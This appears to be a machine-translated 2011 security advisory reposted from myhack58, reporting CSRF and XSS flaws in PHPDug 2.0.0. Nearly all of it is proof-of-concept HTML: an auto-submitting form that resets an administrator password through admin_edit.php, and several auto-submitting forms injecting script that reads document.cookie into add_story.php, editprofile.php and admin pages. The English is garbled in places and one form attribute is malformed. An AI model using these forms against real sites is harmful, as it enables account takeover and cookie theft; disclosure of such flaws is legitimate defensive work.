PHPDug CSRF/XSS multiple vulnerability-vulnerability warning-the black bar safety net

2011-05-07T00:00:00
ID MYHACK58:62201130369
Type myhack58
Reporter 佚名
Modified 2011-05-07T00:00:00

Description

Vulnerability description: PHPDug 2.0.0 cross-site request forgery vulnerability(CSRF)andXSScross-site vulnerability, successfully exploited this vulnerability could cause the application of a compromise, and cookie-based authentication credentials, disclosure or theft of sensitive data is modified.

CSRF vulnerability: due to the vulnerability exists in the“admin/ admin_edit.php”script does not properly validate HTTP requests. The following test poc of:

<form action="http://www.myhack58.com/adm/admin_edit.php" method="post" name="main"> <input type="hidden" name="id[1]" value="USERID"> <input type="hidden" name="username[USERID]" value="Admin"> <input type="hidden" name="password[USERID]" value="test123"> <input type="hidden" name="Submit" value="Submit"> </form> <script> document. main. submit(); </script>

XSScross-site vulnerability because the vulnerability exists in“add_story.php”“the editprofile.php”that“admin/ content_add.php”that“admin/ admin_edit.php”it. The following test poc of:

<form action="http://www.myhack58.com/add_story.php" method="post" name="main"> <input type="hidden" name="story_url" value='http://www.baidu.com/"><script>alert(document. cookie)</script>' > <input type="hidden" name="Submit" value="Continue"> </form> <script> document. main. submit(); </script>

<form action="http://www.myhack58.com/editprofile.php" method="post" name="main"> <input type="hidden" name="email" value='email (at) example (dot) com [email concealed]"><script>alert(document. cookie)</script>'> <input type="hidden" name="commentst" value="-4"> <input type="hidden" name="Submit" value="Save Changes"> </form> <script> document. main. submit(); </script>

<form action="http://www.myhack58.com/adm/content_add.php" method="post" name="main"> <input type="hidden" name="id" value="9 9 9"> <input type="hidden" name="title" value='page"><script>alert(document. cookie)</script>'> <input type="hidden" name="contentvalue="content"> <input type="hidden" name="Submit" value="Submit"> </form> <script> document. main. submit(); </script>

<form action="http://www.myhack58.com/adm/admin_edit.php" method="post" name="main"> <input type="hidden" name="id[1]" value="1"> <input type="hidden" name="username[1]" value='admin<script>alert("XSS")</script>'> <input type="hidden" name="password[1]" value=""> <input type="hidden" name="Submit" value="Submit"> </form> <script> document. main. submit(); </script>